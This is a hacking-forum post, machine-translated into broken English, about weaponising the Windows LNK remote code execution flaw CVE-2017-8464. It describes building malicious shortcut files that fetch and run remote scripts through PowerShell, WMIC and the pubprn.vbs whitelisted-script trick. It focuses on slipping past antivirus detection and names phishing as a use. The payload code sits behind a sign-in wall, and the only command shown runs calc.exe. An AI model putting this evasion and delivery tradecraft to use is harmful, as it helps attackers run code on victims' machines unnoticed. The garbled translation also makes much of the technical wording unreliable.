dEEpEst Posted July 5, 2017 Share Posted July 5, 2017 Microsoft Windows LNK remote code execution vulnerability at the beginning to see that some people through the powershell implementation of the code, not long before the major kill soft start killing this lnk file, recommend two kinds of fun to use, who knows who. 0x00. Introduction to Vulnerability Vulnerability Code: CVE-2017-8464 Vulnerability Name: Microsoft Windows LNK Remote Code Execution Vulnerability Vulnerability Description: An attacker could present a removable drive or remote share that contains malicious .LNK files and associated malicious binaries. When a user opens this drive (or remote share) in Windows Explorer or any other application that parses the .LNK file, the malicious binary program will execute the code selected by the attacker on the target system, and the exploiter who successfully exploited the vulnerability You can get the same user rights as the local user. 0x01.Powershell use Vulnerability just came out, there are players using the following code through the implementation of powershell powershell, load the remote script and execute the code: This is the hidden content, please Sign In or Sign Up This approach has many advantages, first powershell powerful, free killing ability, followed by the use of this way to directly load the remote script, no need to implement the local binary file like a vulnerability description. But this way has now been able to detect the major kill soft, it is difficult to do free to kill, as follows: This is the hidden content, please Sign In or Sign Up This time to fight against the need to kill the soft through other means, the following describes two. 0x02.WMIC use WMIC is a windows comes with system management tools, powerful than cmd, used to replace cmd. Help documentation can refer to This is the hidden content, please Sign In or Sign Up ).aspx can also be directly under the cmd input wmic into the interactive interface to view the help, not much description here. We look at the most basic wmic implementation of the system command, as follows: Wmic /node:127.0.0.1 process call create "calc.exe"Directly in the cmd input into the order to execute calc.exe, this time we try to lnk way by calling wmic implementation of the order: This is the hidden content, please Sign In or Sign Up In this way perfect to bypass the 360 test, the test can be successfully on the line. Although the power is not powerful powershell, but more powerful than the cmd, there are still many places to explore. Of course, this way can also be combined with powershell to implement the remote code, to see how you combination, such as: This is the hidden content, please Sign In or Sign Up 0x03. White List Scripts are used Not much to say, directly on a big brother had recommended me a way: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up We look at this code, the first use cscript implementation C: \ Windows \ System32 \ Printing_Admin_Scripts \ zh / CN \ pubprn.vbs, pubprn.vbs is the system comes with the printer script, as behind the script: https: // Way to load the sct file, and the implementation of the vb code inside the principle I did not get to know that this may be the big brother of the high-end it Then we first put down the principle, combined with. Lnk file vulnerability to test a wave,. Lnk target directly write code: This is the hidden content, please Sign In or Sign Up Successfully executed as follows: This is the hidden content, please Sign In or Sign Up On the above several methods to generate shortcuts to scan, as follows, only powershell was detected, the other two can bypass the successful implementation of malicious code 360 on the line. This is the hidden content, please Sign In or Sign Up 0x04 CVE-2017-8464 This shortcut through the shortcuts itself is no technical content, the principle is equivalent to the same hyperlink. Only with the development of powershell, this way to load the remote script and implementation because of its hidden strong, leaving fewer traces and more and more popular. Due to the shortcuts of this hyperlink characteristics, to the implementation of any program on the system or script, playable great. In addition to the above mentioned two new games, all the code can be executed by the implementation of shortcuts, and shortcut icons can be easily changed to the system comes with a variety of icons, to further improve its hidden, Travel, kill the weapon of fishing. Link to comment Share on other sites More sharing options...
.webp.8407a83ac96563f75e1c428a1f0d4c3e.webp)
.webp.9a04cec050a656fab081ac190f971c3f.webp)
Hack Tools Resurrection
dEEpEst
Recommended Posts